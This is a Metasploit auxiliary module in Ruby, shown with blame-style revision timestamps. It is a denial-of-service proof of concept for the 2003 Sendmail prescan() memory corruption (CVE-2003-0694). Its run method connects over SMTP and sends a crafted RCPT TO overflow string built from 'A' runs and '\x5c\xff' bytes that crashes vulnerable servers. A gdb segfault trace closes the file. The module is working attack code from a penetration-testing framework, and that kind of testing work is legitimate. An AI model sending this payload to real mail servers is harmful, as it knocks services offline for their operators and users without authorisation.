metasploit-framework/modules/auxiliary/dos/smtp/sendmail_prescan.rb

67 lines
2.0 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Smtp
include Msf::Auxiliary::Dos
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Sendmail SMTP Address prescan Memory Corruption',
2013-08-30 21:28:54 +00:00
'Description' => %q{
This is a proof of concept denial of service module for Sendmail versions
8.12.8 and earlier. The vulnerability is within the prescan() method when
parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00
bytes can be used, limiting the likelihood for arbitrary code execution.
},
'Author' => [ 'patrick' ],
'References' =>
[
[ 'OSVDB', '2577' ],
2013-08-30 21:28:54 +00:00
[ 'CVE', '2003-0694' ],
[ 'BID', '8641' ],
[ 'EDB', '24' ]
],
'DisclosureDate' => 'Sep 17 2003'))
end
2013-08-30 21:28:54 +00:00
def run
begin
connect
# we use connect instead of connect_login,
# because we send our own malicious RCPT.
# however we want to make use of MAILFROM
# and raw_send_recv()
#select(nil,nil,nil,23) # so we can attach gdb to the child PID
2013-08-30 21:28:54 +00:00
sploit = ("A" * 255 + ";") * 4 + "A" * 217 + ";" + "\x5c\xff" * 28
2013-08-30 21:28:54 +00:00
raw_send_recv("EHLO X\r\n")
raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
print_status("Sending DoS packet.")
raw_send_recv("RCPT TO: #{sploit}\r\n")
2013-08-30 21:28:54 +00:00
disconnect
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport}")
rescue ::EOFError
print_status("Sendmail stopped responding after sending trigger - target vulnerable.")
end
2013-08-30 21:28:54 +00:00
end
end
=begin
Program received signal SIGSEGV, Segmentation fault.
0x8073499 in ?? ()
(gdb) bt
#0 0x807e499 in ?? ()
#1 0x087e125 in ?? ()
#2 0x5c5c5c5c in ?? ()
Error accessing memory address 0x5c5c5c5c: Bad address.
=end